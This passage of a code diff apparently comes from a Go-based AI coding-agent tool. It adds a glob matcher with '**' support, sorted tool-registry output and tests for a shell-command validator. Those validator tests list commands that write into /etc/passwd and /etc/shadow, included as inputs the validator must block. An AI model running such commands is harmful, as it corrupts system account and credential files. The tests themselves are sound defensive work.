				t.Errorf("ValidateCommand(%q).Check = %d, want CheckIndirectExec (%d)", cmd, v.Check, CheckIndirectExec)
			}
		})
	}
}
func TestCheckIndirectExec_Allowed(t *testing.T) {
	// Direct script invocation (no -c flag, no pipe) is legitimate and
	// must not trip the indirect-exec check.
	for _, cmd := range []string{"bash script.sh", "sh script.sh"} {
		t.Run(cmd, func(t *testing.T) {
			if v := checkIndirectExec(cmd); v != nil {
				t.Errorf("checkIndirectExec(%q) = %v, want nil", cmd, v)
			}
		})
	}
}
func TestCheckSensitiveRedirection_Blocked(t *testing.T) {
	// Both spaced and unspaced redirection spellings, truncate and append,
	// must be rejected when the target is a sensitive path.
	for _, cmd := range []string{
		"echo evil >/etc/passwd",
		"echo evil > /etc/passwd",
		"echo evil>>/etc/shadow",
		"echo evil >> /etc/shadow",
	} {
		t.Run(cmd, func(t *testing.T) {
			if ValidateCommand(cmd) == nil {
				t.Errorf("ValidateCommand(%q) = nil, want violation", cmd)
			}
		})
	}
}
func TestCheckProcessSubstitution_Allowed(t *testing.T) {
	// <() and >() are valid bash process substitution and must not be
	// misclassified as zsh-dangerous constructs.
	for _, cmd := range []string{
		"diff <(sort a.txt) <(sort b.txt)",
		"tee >(gzip > out.gz)",
	} {
		t.Run(cmd, func(t *testing.T) {
			v := ValidateCommand(cmd)
			if v != nil && v.Check == CheckZshDangerous {
				t.Errorf("ValidateCommand(%q): process substitution should not trigger ZshDangerous, got %v", cmd, v)
			}
		})
	}
}

View File

@@ -310,6 +310,62 @@ func TestGlobTool_NoMatches(t *testing.T) {
}
}
func TestGlobTool_Doublestar(t *testing.T) {
	// Fixture tree:
	//   main.go
	//   internal/foo/foo.go
	//   cmd/bar/bar.go
	//   cmd/bar/bar_test.go
	dir := t.TempDir()
	// write creates an empty file (and its parent dirs) under dir.
	// Setup errors were previously ignored, which could mask fixture
	// failures as pattern-count mismatches.
	write := func(rel string) {
		t.Helper()
		p := filepath.Join(dir, rel)
		if err := os.MkdirAll(filepath.Dir(p), 0o755); err != nil {
			t.Fatalf("MkdirAll(%s): %v", rel, err)
		}
		if err := os.WriteFile(p, []byte(""), 0o644); err != nil {
			t.Fatalf("WriteFile(%s): %v", rel, err)
		}
	}
	write("main.go")
	write(filepath.Join("internal", "foo", "foo.go"))
	write(filepath.Join("cmd", "bar", "bar.go"))
	write(filepath.Join("cmd", "bar", "bar_test.go"))
	g := NewGlobTool()
	tests := []struct {
		pattern string
		want    int
	}{
		{"**/*.go", 4},
		{"**/*_test.go", 1},
		{"internal/**/*.go", 1},
		{"cmd/**/*.go", 2},
		{"*.go", 1}, // only root-level, no ** — existing behaviour unchanged
	}
	for _, tc := range tests {
		result, err := g.Execute(context.Background(), mustJSON(t, globArgs{Pattern: tc.pattern, Path: dir}))
		if err != nil {
			t.Fatalf("pattern %q: Execute: %v", tc.pattern, err)
		}
		if result.Metadata["count"] != tc.want {
			t.Errorf("pattern %q: count = %v, want %d\noutput:\n%s", tc.pattern, result.Metadata["count"], tc.want, result.Output)
		}
	}
}
func TestMatchGlob_DoublestarEdgeCases(t *testing.T) {
	cases := []struct {
		pattern, name string
		want          bool
	}{
		{"**/*.go", "main.go", true},
		{"**/*.go", "internal/foo/foo.go", true},
		{"**/*.go", "a/b/c/d.go", true},
		{"**/*.go", "main.ts", false},
		{"internal/**/*.go", "internal/foo/bar.go", true},
		{"internal/**/*.go", "cmd/foo/bar.go", false},
		{"**", "anything/goes", true},
		{"*.go", "main.go", true},
		{"*.go", "sub/main.go", false}, // no ** — single level only
	}
	for _, c := range cases {
		if got := matchGlob(c.pattern, c.name); got != c.want {
			t.Errorf("matchGlob(%q, %q) = %v, want %v", c.pattern, c.name, got, c.want)
		}
	}
}
// --- Grep ---
func TestGrepTool_Interface(t *testing.T) {

View File

@@ -5,6 +5,7 @@ import (
"encoding/json"
"fmt"
"os"
"path"
"path/filepath"
"sort"
"strings"
@@ -80,13 +81,7 @@ func (t *GlobTool) Execute(_ context.Context, args json.RawMessage) (tool.Result
return nil
}
matched, err := filepath.Match(a.Pattern, rel)
if err != nil {
// Try matching just the filename for simple patterns
matched, _ = filepath.Match(a.Pattern, d.Name())
}
if matched {
if matchGlob(a.Pattern, rel) {
matches = append(matches, rel)
}
return nil
@@ -115,3 +110,50 @@ func (t *GlobTool) Execute(_ context.Context, args json.RawMessage) (tool.Result
Metadata: map[string]any{"count": len(matches), "pattern": a.Pattern},
}, nil
}
// matchGlob matches a relative path against a glob pattern.
// Unlike filepath.Match, it supports ** to match zero or more path components.
func matchGlob(pattern, name string) bool {
	// Normalize to forward slashes for consistent component splitting.
	pattern = filepath.ToSlash(pattern)
	name = filepath.ToSlash(name)
	// Without **, defer entirely to the standard single-level matcher.
	if !strings.Contains(pattern, "**") {
		matched, _ := filepath.Match(pattern, filepath.FromSlash(name))
		return matched
	}
	return matchComponents(strings.Split(pattern, "/"), strings.Split(name, "/"))
}

// matchComponents recursively matches pattern segments against path segments.
// A "**" segment matches zero or more consecutive path components.
func matchComponents(pats, parts []string) bool {
	if len(pats) == 0 {
		// Pattern exhausted: a match only if the path is exhausted too.
		return len(parts) == 0
	}
	if pats[0] == "**" {
		// Collapse runs of ** into one.
		rest := pats
		for len(rest) > 0 && rest[0] == "**" {
			rest = rest[1:]
		}
		if len(rest) == 0 {
			return true // trailing ** swallows the remainder
		}
		// Anchor the remaining pattern at each suffix of the path.
		for i := range parts {
			if matchComponents(rest, parts[i:]) {
				return true
			}
		}
		return false
	}
	if len(parts) == 0 {
		return false
	}
	if ok, err := path.Match(pats[0], parts[0]); err != nil || !ok {
		return false
	}
	return matchComponents(pats[1:], parts[1:])
}

View File

@@ -3,6 +3,7 @@ package tool
import (
"encoding/json"
"fmt"
"sort"
"sync"
)
@@ -40,7 +41,7 @@ func (r *Registry) Get(name string) (Tool, bool) {
return t, ok
}
// All returns all registered tools.
// All returns all registered tools sorted by name for deterministic ordering.
func (r *Registry) All() []Tool {
r.mu.RLock()
defer r.mu.RUnlock()
@@ -48,10 +49,11 @@ func (r *Registry) All() []Tool {
for _, t := range r.tools {
all = append(all, t)
}
sort.Slice(all, func(i, j int) bool { return all[i].Name() < all[j].Name() })
return all
}
// Definitions returns tool definitions for all registered tools,
// Definitions returns tool definitions for all registered tools sorted by name,
// suitable for sending to the LLM.
func (r *Registry) Definitions() []Definition {
r.mu.RLock()
@@ -64,6 +66,7 @@ func (r *Registry) Definitions() []Definition {
Parameters: t.Parameters(),
})
}
sort.Slice(defs, func(i, j int) bool { return defs[i].Name < defs[j].Name })
return defs
}

File diff suppressed because it is too large Load Diff

View File

@@ -94,6 +94,14 @@ var (
sText = lipgloss.NewStyle().
Foreground(cText)
sThinkingLabel = lipgloss.NewStyle().
Foreground(cOverlay).
Italic(true)
sThinkingBody = lipgloss.NewStyle().
Foreground(cOverlay).
Italic(true)
)
// Status bar